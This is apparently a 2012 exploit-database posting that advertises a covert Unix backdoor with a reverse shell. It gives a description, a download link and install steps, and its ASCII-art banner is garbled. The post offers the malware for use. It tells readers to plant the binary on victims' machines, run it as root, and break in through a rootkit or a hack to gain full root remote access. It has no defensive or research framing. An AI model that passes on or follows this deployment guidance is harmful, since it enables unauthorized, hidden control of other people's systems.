You are on page 1of 1

============================================

TCP/IP Invisible Userland Unix Backdoor with Reverse Shell


============================================
/*
* ______
______
_ _______
* ( __ \ / ___ \ |\
/|
( )( __
)
* | ( \ )\/
\ \| )
( |
/ / | ( ) |
* | |
) |
___) /| |
| |
/ / | | /
|
* | |
| | (___ ( ( (
) )
/ /
| (/ /) |
* | |
) |
) \ \ \_/ /
/ /
|
/ | |
* | (__/ )/\___/ / \
/
/ /
| (__) |
* (______/ \______/
\_/
(_)
(_______)
*/
########################################################################
# Author: D3V/0
# Exploit Title: TCP/IP Invisible Userland Unix Backdoor with Reverse Shell
# Date: 06-30-2012
# Version: 0.0.1
# Category: platform
# Tested on: unix
# Contact: d3vslash0@hushmail.com
# Website: milw0rm / Inj3ct0r Exploit DataBase 1337day.com
########################################################################
[info]
this is an advanced and invisible unix userland backdoor based on tcp/ip. the
server waits for magic packets by sniffing. if a magic packet arrives, it
will bind a shell over tcp or udp on the given port. the client can then send
further magic packets to get a reverse-shell.
[code]
this backdoor is fully written in c.
[download]
you can download the backdoor here: http://www.multiupload.nl/Q864SZGXL9
[install]
do "make linux", if you want to build the backdoor for linux systems. if you
just type "make", you will see a list of all supported and tested unix
systems.
once it's compiled, put the "ubdd" executable on your victims' machine and
start it with root. (you can infect the machine with the backdoor via a
rootkit or a hack)
now start "un1xb4ckd00r" on your machine. use the "-H" argument to find out
what to do.
if done right, you will have a reverse shell to your victims' machine with
full root access.
[more]
for more information consult the README file.
#############################################################################
###########

You might also like